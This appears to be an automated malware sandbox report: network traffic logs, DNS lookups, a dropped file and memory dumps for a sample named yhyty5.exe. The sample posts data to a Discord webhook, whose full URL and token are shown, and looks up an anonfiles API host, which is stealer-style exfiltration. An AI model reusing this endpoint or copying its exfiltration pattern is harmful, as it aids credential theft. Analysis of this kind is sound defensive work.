                https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE; _EDGE_S=SID=165254AF97566138146C40D996FC605F
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MSPTC=KuA8Y97t_HnAMpU4D1AkOM1nkERHn4FGM5aMx7OrbiQ; domain=.bing.com; expires=Fri, 30-May-2025 17:28:41 GMT; path=/; Partitioned; secure; SameSite=None
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 398BD1E2FEF9496F97F0C6F1B87EBA3B Ref B: LON04EDGE0717 Ref C: 2024-05-05T17:28:41Z
                date: Sun, 05 May 2024 17:28:40 GMT
              • flag-nl
                GET
                https://www.bing.com/aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
                Remote address:
                23.62.61.194:443
                Request
                GET /aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644 HTTP/2.0
                host: www.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE
                Response
                HTTP/2.0 200
                cache-control: private,no-store
                pragma: no-cache
                vary: Origin
                p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: F550CFFD186342AE823EC73FCF96B5BC Ref B: DUS30EDGE0713 Ref C: 2024-05-05T17:28:41Z
                content-length: 0
                date: Sun, 05 May 2024 17:28:41 GMT
                set-cookie: _EDGE_S=SID=165254AF97566138146C40D996FC605F; path=/; httponly; domain=bing.com
                set-cookie: MUIDB=2D0F2031F60E6E140AF23447F7296FFE; path=/; httponly; expires=Fri, 30-May-2025 17:28:41 GMT
                alt-svc: h3=":443"; ma=93600
                x-cdn-traceid: 0.be3d3e17.1714930121.d2d7c4
              • flag-us
                DNS
                237.197.79.204.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                237.197.79.204.in-addr.arpa
                IN PTR
                Response
              • flag-nl
                GET
                https://www.bing.com/th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
                Remote address:
                23.62.61.194:443
                Request
                GET /th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
                host: www.bing.com
                accept: */*
                cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE; _EDGE_S=SID=165254AF97566138146C40D996FC605F; MSPTC=KuA8Y97t_HnAMpU4D1AkOM1nkERHn4FGM5aMx7OrbiQ; MUIDB=2D0F2031F60E6E140AF23447F7296FFE
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-type: image/png
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                content-length: 457
                date: Sun, 05 May 2024 17:28:41 GMT
                alt-svc: h3=":443"; ma=93600
                x-cdn-traceid: 0.be3d3e17.1714930121.d2d9fa
              • flag-us
                DNS
                194.61.62.23.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                194.61.62.23.in-addr.arpa
                IN PTR
                Response
                194.61.62.23.in-addr.arpa
                IN PTR
                a23-62-61-194deploystaticakamaitechnologiescom
              • flag-us
                DNS
                194.61.62.23.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                194.61.62.23.in-addr.arpa
                IN PTR
              • flag-us
                DNS
                77.239.69.13.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                77.239.69.13.in-addr.arpa
                IN PTR
                Response
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                1.4kB
                5.0kB
                11
                12

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                1.4kB
                2.3kB
                9
                10

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                87.5kB
                3.5kB
                71
                40

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                2.8kB
                2.2kB
                8
                8

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 204.79.197.200:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                8.1kB
                16
                14
              • 204.79.197.200:443
                https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                tls, http2
                76.4kB
                2.2MB
                1594
                1592

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200
              • 204.79.197.200:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                8.1kB
                16
                14
              • 204.79.197.200:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                8.1kB
                16
                14
              • 204.79.197.237:443
                https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
                tls, http2
                2.5kB
                9.0kB
                20
                17

                HTTP Request

                GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

                HTTP Response

                204

                HTTP Request

                GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

                HTTP Response

                204
              • 23.62.61.194:443
                https://www.bing.com/aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
                tls, http2
                1.5kB
                5.4kB
                17
                12

                HTTP Request

                GET https://www.bing.com/aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644

                HTTP Response

                200
              • 23.62.61.194:443
                https://www.bing.com/th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
                tls, http2
                1.6kB
                5.7kB
                16
                11

                HTTP Request

                GET https://www.bing.com/th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

                HTTP Response

                200
              • 8.8.8.8:53
                228.249.119.40.in-addr.arpa
                dns
                73 B
                159 B
                1
                1

                DNS Request

                228.249.119.40.in-addr.arpa

              • 8.8.8.8:53
                172.210.232.199.in-addr.arpa
                dns
                74 B
                128 B
                1
                1

                DNS Request

                172.210.232.199.in-addr.arpa

              • 8.8.8.8:53
                api.anonfiles.com
                dns
                yhyty5.exe
                63 B
                133 B
                1
                1

                DNS Request

                api.anonfiles.com

              • 8.8.8.8:53
                discord.com
                dns
                yhyty5.exe
                57 B
                137 B
                1
                1

                DNS Request

                discord.com

                DNS Response

                162.159.136.232
                162.159.137.232
                162.159.128.233
                162.159.135.232
                162.159.138.232

              • 8.8.8.8:53
                69.31.126.40.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                69.31.126.40.in-addr.arpa

              • 8.8.8.8:53
                95.221.229.192.in-addr.arpa
                dns
                73 B
                144 B
                1
                1

                DNS Request

                95.221.229.192.in-addr.arpa

              • 8.8.8.8:53
                232.136.159.162.in-addr.arpa
                dns
                74 B
                136 B
                1
                1

                DNS Request

                232.136.159.162.in-addr.arpa

              • 8.8.8.8:53
                86.23.85.13.in-addr.arpa
                dns
                70 B
                144 B
                1
                1

                DNS Request

                86.23.85.13.in-addr.arpa

              • 8.8.8.8:53
                171.39.242.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                171.39.242.20.in-addr.arpa

              • 8.8.8.8:53
                17.14.97.104.in-addr.arpa
                dns
                71 B
                135 B
                1
                1

                DNS Request

                17.14.97.104.in-addr.arpa

              • 8.8.8.8:53
                0.205.248.87.in-addr.arpa
                dns
                71 B
                116 B
                1
                1

                DNS Request

                0.205.248.87.in-addr.arpa

              • 8.8.8.8:53
                26.35.223.20.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                26.35.223.20.in-addr.arpa

              • 8.8.8.8:53
                tse1.mm.bing.net
                dns
                62 B
                173 B
                1
                1

                DNS Request

                tse1.mm.bing.net

                DNS Response

                204.79.197.200
                13.107.21.200

              • 8.8.8.8:53
                48.229.111.52.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                48.229.111.52.in-addr.arpa

              • 8.8.8.8:53
                g.bing.com
                dns
                56 B
                151 B
                1
                1

                DNS Request

                g.bing.com

                DNS Response

                204.79.197.237
                13.107.21.237

              • 8.8.8.8:53
                237.197.79.204.in-addr.arpa
                dns
                73 B
                143 B
                1
                1

                DNS Request

                237.197.79.204.in-addr.arpa

              • 8.8.8.8:53
                194.61.62.23.in-addr.arpa
                dns
                142 B
                135 B
                2
                1

                DNS Request

                194.61.62.23.in-addr.arpa

                DNS Request

                194.61.62.23.in-addr.arpa

              • 8.8.8.8:53
                77.239.69.13.in-addr.arpa
                dns
                71 B
                145 B
                1
                1

                DNS Request

                77.239.69.13.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\passwords.txt

                Filesize

                1B

                MD5

                68b329da9893e34099c7d8ad5cb9c940

                SHA1

                adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

                SHA256

                01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

                SHA512

                be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

              • memory/2140-0-0x0000000000250000-0x0000000000266000-memory.dmp

                Filesize

                88KB

              • memory/2140-1-0x00007FFB21EF3000-0x00007FFB21EF5000-memory.dmp

                Filesize

                8KB

              • memory/2140-3-0x000000001B2D0000-0x000000001B2EA000-memory.dmp

                Filesize

                104KB

              • memory/2140-2-0x00000000023B0000-0x00000000023BA000-memory.dmp

                Filesize

                40KB

              • memory/2140-5-0x00007FFB21EF0000-0x00007FFB229B1000-memory.dmp

                Filesize

                10.8MB

              • memory/2140-24-0x000000001C250000-0x000000001C262000-memory.dmp

                Filesize

                72KB

              • memory/2140-25-0x000000001C3C0000-0x000000001C3FC000-memory.dmp

                Filesize

                240KB

              • memory/2140-27-0x00007FFB21EF0000-0x00007FFB229B1000-memory.dmp

                Filesize

                10.8MB